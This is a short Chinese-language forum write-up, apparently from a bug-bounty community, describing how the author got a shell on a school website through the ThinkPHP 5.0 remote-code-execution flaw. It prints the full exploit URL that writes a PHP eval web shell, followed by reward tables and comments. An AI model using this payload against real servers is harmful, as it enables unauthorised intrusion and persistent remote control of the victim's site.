记一次教育SRC getshell
看到一个站点,随手/admin尝试寻找后台,但是没用,报错输出一个很有用的信息
ThinkPHP V5.0.16 尝试远程代码执行漏洞居然成功了
好家伙直接命令执行写马子
http://xxx:8080/tp5.0.22/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo “<?php @eval($_REQUEST[666]); ?>%20 “>1.php
phpinfo信息显示没问题,直接上菜刀连接,去提交edu src,幸福来得太突然,网站异常,edu src没收录.不过方法是学到了,还是可以的
| 用户名 | 金币 | 积分 | 时间 | 理由 |
|---|---|---|---|---|
| eqwer | 5.00 | 0 | 2021-04-27 17:05:17 | 一个受益终生的帖子~~ |
| Track-聂风 | 45.00 | 0 | 2021-04-25 15:03:25 | 文章打赏 + 限时活动 |
打赏我,让我更有动力~
LoginCan Publish Content
返回:技术文章投稿区
实战纪实
spider
发表于 2021-4-23
牛
评论列表
加载数据中...
Track-聂风
发表于 2021-4-25
也是可以提交的,问题不大
评论列表
加载数据中...
eqwer
发表于 2021-4-27
文章挺好,就是打码不全,仔细一看就能发现学校名
评论列表
加载数据中...
ych0515
发表于 2021-5-26
这个edusrc不收吗?
评论列表
加载数据中...
治秃用霸王
发表于 8个月前
菜鸡路过
评论列表
加载数据中...